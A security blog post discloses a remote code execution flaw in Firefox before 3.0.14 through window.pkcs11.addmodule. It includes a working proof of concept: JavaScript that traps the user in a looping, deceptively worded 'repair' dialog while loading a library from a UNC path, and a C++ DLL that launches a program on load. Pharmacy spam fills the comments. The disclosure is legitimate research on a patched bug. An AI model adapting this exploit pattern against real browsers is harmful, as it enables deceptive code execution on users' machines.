Sep 14

Mozilla Firefox < 3.0.14 Multiplatform RCE via pkcs11.addmodule

By jason Security Tools Add comments

Fix announce:   http://www.mozilla.org/security/announce/2009/mfsa2009-48.html
Bug history: https://bugzilla.mozilla.org/show_bug.cgi?id=326628

So, Firefox up through 3.0.13 had an obscure little function under window.pkcs11:

long                      addmodule(in DOMString moduleName,
                                     in DOMString libraryFullPath,
                                     in long cryptoMechanismFlags,
                                     in long cipherFlags);

Yes, that’s actually the full path to a DLL — or an .so on Linux/OSX —
from a JS function that’s exposed to the web.

Attacker doesn’t get zero click install — there’s a dialog — but:

1) Attacker does get to customize the dialog via moduleName
2) The dialog is modal, so the user doesn’t get access to Firefox again
until they hit OK (can’t even close Firefox)
3) On Windows, he can put a UNC path in for the Library path.  There’s
probably similar on OSX and some Linux distros.  Even without, there’s
usually a way to get a file in a known location — see John Heasman’s
Java work.

LoadLibrary of Attacker library on OK.

Repro:

<body>
<script>

  var str = "Error detected in Firefox Module NSP31337.bin.\n" +
           "Please click ‘OK’ to repair."

  ret=-2;
  while(ret!=-5){
     ret=window.pkcs11.addmodule("\n\n\n" + str + "\n\n\n", "\\\\127.0.0.1\\c$\\
pkunkcs", 0, 0);
  }

</script>

"Shellcode" is just a DLL with ShellExecute in the constructor:

CpkunkcsApp::CpkunkcsApp()
{

    char *str = "c:\\windows\\system32\\calc.exe";
    wchar_t *wText;
    size_t len;
    len = strlen(str)+1;

    wText = new wchar_t[strlen(str)];
    memset(wText, 0, len * sizeof(wchar_t));

    ::MultiByteToWideChar(CP_ACP, NULL, str, -1, wText, len);

    ShellExecute(NULL, NULL, wText, NULL, NULL, SW_SHOW);

}

Cheers to Jesse Ruderman, who recognized this was probably not the
greatest of API’s some time ago.  The bug history is worth taking a look
at…goes back a while.  They missed the UNC path vector, and appear to
have underestimated the modal dialog.

Related Posts

8 Responses to “Mozilla Firefox < 3.0.14 Multiplatform RCE via pkcs11.addmodule”

  1. Astuce Marketing says:
    06/15/2011 at 7:05 pm

    Very good site you have here but I was wanting to know if you knew of any forums that cover the same topics discussed in this article? I’d really love to be a part of community where I can get opinions from other knowledgeable people that share the same interest. If you have any recommendations, please let me know. Kudos!

  2. side says:
    12/16/2009 at 6:05 am

    Hello!
    accutane side effects dangerous , dangerous side effects celexa , dosages valium , diet pill phentermine , what are symptoms of withdrawl from alprazolam ,

  3. side says:
    12/09/2009 at 3:52 pm

    Hello!
    ultram side affect ,

  4. side says:
    12/08/2009 at 12:26 pm

    Hello!
    accutane side effects attorney , ultram dose , adipex p web site , tramadol side effects , celexa experience ,

  5. side says:
    12/08/2009 at 4:02 am

    Hello!
    meridia side effects ,

  6. Pharmg401 says:
    11/02/2009 at 1:53 am

    Very nice site!

  7. Pharmk823 says:
    09/16/2009 at 8:18 am

    Very nice site!

  8. Pharma598 says:
    09/16/2009 at 7:47 am

    Very nice site!

Leave a Reply

preload preload preload